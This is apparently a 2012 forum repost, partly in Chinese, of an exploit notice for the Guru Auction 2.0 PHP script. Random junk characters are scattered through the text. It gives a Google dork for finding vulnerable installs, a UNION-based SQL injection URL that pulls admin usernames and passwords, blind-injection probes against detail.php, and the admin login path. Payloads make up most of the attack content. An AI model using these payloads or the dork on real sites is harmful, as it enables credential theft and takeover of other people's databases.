Guru Auction 2.0 Multiple SQL Injection Vulnerabilities3 ?+ s5 h! ?1 k. i1 h7 ^7 N+ b+ |! t
8 ^ n0 s& W7 Z* t, b8 n6 K作者 : v3n0m
) k# t: E+ q; c% p0 H应用 : Guru Auction 2.05 _9 `2 b4 h/ y% e9 `6 a* i" D- l* }
Price : $49
6 q9 G# x {7 z' {# r% LVendor : http://www.guruscript.com/6 M: z( u/ }1 m
Google Dork : inurl:subcat.php?cate_id=& Z; F2 a$ K/ E& X: e7 M6 B* q
7 ~6 |1 v, \. M7 R7 H, \( FSQLi p0c:
8 }# |( _( @/ f2 W~~~~~~~~~~% o3 `" X1 I2 D2 W+ J; T- U. S
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--% j6 O$ i' ?- w: q1 {
! H+ U& A7 R& n% O, T6 _' Q $ V2 ~' F( d4 o, V' ^6 T5 r$ ]
盲注 p0c:+ J& \8 p N% C7 ^: A$ H
~~~~~~~~~~. b K2 b9 `2 q
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
. J" @5 w$ Q8 a4 k; Ehttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
$ [+ O3 I4 T* [& b( H1 G( r ; l$ {- M. _/ S/ v6 ?
管理登录入口:
& _2 b( K) J6 ^% Q~~~~~~~~~~# ^+ h5 q; O' [8 h: Z& s- u2 S
http://domain.tld/[path]/admin/
3 z. o% t6 i0 J& B! | |
发表于 2012-12-31 09:24:05
收藏
支持
反对